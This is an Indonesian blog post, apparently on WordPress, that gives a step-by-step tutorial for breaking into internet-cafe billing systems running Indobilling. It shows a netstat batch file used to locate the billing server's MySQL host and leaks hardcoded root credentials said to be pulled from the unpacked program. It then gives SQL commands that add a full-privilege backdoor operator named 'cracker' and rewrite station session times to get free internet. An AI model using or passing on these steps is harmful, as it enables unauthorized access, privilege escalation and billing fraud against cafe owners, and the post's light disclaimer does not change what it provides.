Membobol Warnet

Cara Membobol Warnet

Mo main-main dengan ngerubah nama warnet, alamat warnet, registrasi warnet atau ngenet
gratis? Gampang kok. Ikuti aja tutotrial di bawah ini. Inget, ini cuma buat coba-coba aja. Jangan
ngerugiin warnet dengan internet gratis! Kan yang punya butuh maem juga,hihihihihihihhi….
Caranya adalah memanfaatkan SQL Manager. Username dan password dicari nanti aja. Kalo IP
pake Netstat aja bro

caranya ::
buat file “netstat.bat” yang isinya berikut ini

============== NETSTAT.BAT ============= [don’t copy paste this line]
netstat >> netstat.txt
open netstat.txt
========= END OF NETSTAT.BAT =========== [don’t copy paste this line]

fungsi dari perintah ini adalah mencetak hasil dari “netstat” ke dalam sebuah file netstat.txt lalu
membuka file tersebut. hal ini perlu dilakukan karena indobilling akan melakukan close terhadap
comand prompt. (mulai deh make bahasa formal. biasa aj napa bung !!!)
nahhh .. dr hasil netstat itu, bs diliat port 3306 (port default na mySQL) lagi konek kmn.

contoh ::

========= RESULT OF NETSTAT ==================
Proto Local Address Foreign Address State
TCP 127.0.0.1:49218 Owner-PC:49219 ESTABLISHED
TCP 127.0.0.1:49219 Owner-PC:49218 ESTABLISHED
TCP 127.0.0.1:49220 Owner-PC:49221 ESTABLISHED
TCP 127.0.0.1:49221 Owner-PC:49220 ESTABLISHED
TCP 192.168.10.16:49168 cs31:5050 ESTABLISHED
TCP 192.168.10.16:49173 sip36:https ESTABLISHED
TCP 192.168.10.16:49559 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49560 202.96.64.144:55944 ESTABLISHED
TCP 192.168.10.16:49561 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49562 202.96.64.144:ftp ESTABLISHED

TCP 192.168.10.16:49565 192.168.10.1:3306 ESTABLISHED
==============================================

keliatan kan kalo port 3306 lagi konek ke IP 192.168.10.1. Nah IP itu tu IP na Billing Server.
Sekarang tinggal konek ke DB mySQL pake SQLyog. yg belom punya SQLyog bs didapet dengan
Googling pake keyword Download SQLyog.

Sekarang mulai untuk konek ke DB mySQL nya server.
Yang diperluin untuk bisa konek ke DB adalah user name, password dan IP address nya server,
yang msh jd pertanyaan adalah “password & username” nya apa ???

==============================
info koneksi ke mySQL server Indo Billing
username : root
password : root1
==============================
Pertanyaan Newbie :
[x]nah lo … tau dari mana tuw ?? emang developer nya temen mu ??? ato di kasih tau di webshit
nya ???
yaahh… sedikit jail lah, buka aja file exe-nya pake Winhex, pasti username+password kesimpan di
exe-nya sebagai ASCII, jd bisa langsung kebaca tanpa perlu convert2xan. but, jgn langsung maen
buka aj, exe-nya diprotect dengan compressor lo, tp jg ga perlu kuatir karena udah ada de-
compressor nya. yang jelas compressor nya make UPX, de-compressor nya nyari ndiri aja ya …
hmmm…. udh deh, kunci udh ditangan, tinggal eksekusi aj.

[x[Cara eksekusi gimane?
ya gampang aja, tinggal make SQLyog nya aja, masukin username, password ama host nya
dengan data-data yang udah didapet sebelum nya. nama database dibiarkan kosong aja.
kalo udah terkoneksi dengan server, maka semua isi database nya bakal keliatan, nah kita bisa
ngubah semua hal yang berhubungan dengan indobilling pada table “warnet”.
misalnya kita pengen nambahin operator di billing server dengan username “cracker” dan
password “cracker” yang full priviledges. bisa dilakukan dengan make GUI nya SQLyog atawa
dengan menjalankan SQL command berikut ini :

============================================= [don’t copy paste this line]
insert into operator
(op_id,op_user,op_password,op_name,item,member,setup,report,close,send,billing,
op_editbilling,op_delbilling,op_editmember,op_delmember,op_edititem,op_delitem,
op_cancel)
values
(22,’cracker’,password(‘cracker’),’intruder’,’true’,’true’,’true’,’true’,’true’,’true’,’true’,’Y’,’Y’,’Y’,’Y’,’Y’,’Y’,’
Y’)
============================================= [don’t copy paste this line]

nahhh …. gampang kan.
kalo pengen ngubah harga billing juga bisa. SQL command nya kira-kira kaya gini ni
dimana,
-> format st_start = ‘yyyy-mm-dd hh:mm:ss’
-> format st_name = ‘nama username’
-> st_id = ‘nomor KBU’
yang perlu diinget adalah nilai “st_start” harus waktu saat pengupdatean DB dilakuin. bisa juga
dengan make fungsi SQL yaitu curdate() dan curdate().

============================================= [don’t copy paste this line]
update station set st_start=’2007-07-01 20:30:30′,st_name=’invisible_theater’,
st_duration=’00:01:00′ where st_id=’1′
============================================= [don’t copy paste this line]

dengan menggunakan fungsi curdate() dan curtime() kira-kira kaya gini ni.

============================================= [don’t copy paste this line]
update station set st_start=concat(curdate(),’ ‘,curtime()),st_name=’invisible_theater’,
st_duration=’00:01:00′ where st_id=’1′
============================================= [don’t copy paste this line]

kalo emang pengen ngganti2x data laen nya silakan cari ndiri aja, ini kan sekedar contoh
implementasi aja.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: